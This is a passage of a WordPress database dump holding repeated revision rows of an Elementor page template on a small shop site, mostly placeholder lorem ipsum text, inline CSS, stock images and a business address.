https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:44:48','2022-09-30 06:14:48','',1373,'https://gopalak.in/?p=1480',0,'revision','',0),(1481,1,'2022-09-30 11:44:48','2022-09-30 06:14:48','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:44:48','2022-09-30 06:14:48','',1373,'https://gopalak.in/?p=1481',0,'revision','',0),(1482,1,'2022-09-30 11:44:49','2022-09-30 06:14:49','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:44:49','2022-09-30 06:14:49','',1373,'https://gopalak.in/?p=1482',0,'revision','',0),(1483,1,'2022-09-30 11:45:19','2022-09-30 06:15:19','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:45:19','2022-09-30 06:15:19','',1373,'https://gopalak.in/?p=1483',0,'revision','',0),(1484,1,'2022-09-30 11:45:19','2022-09-30 06:15:19','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		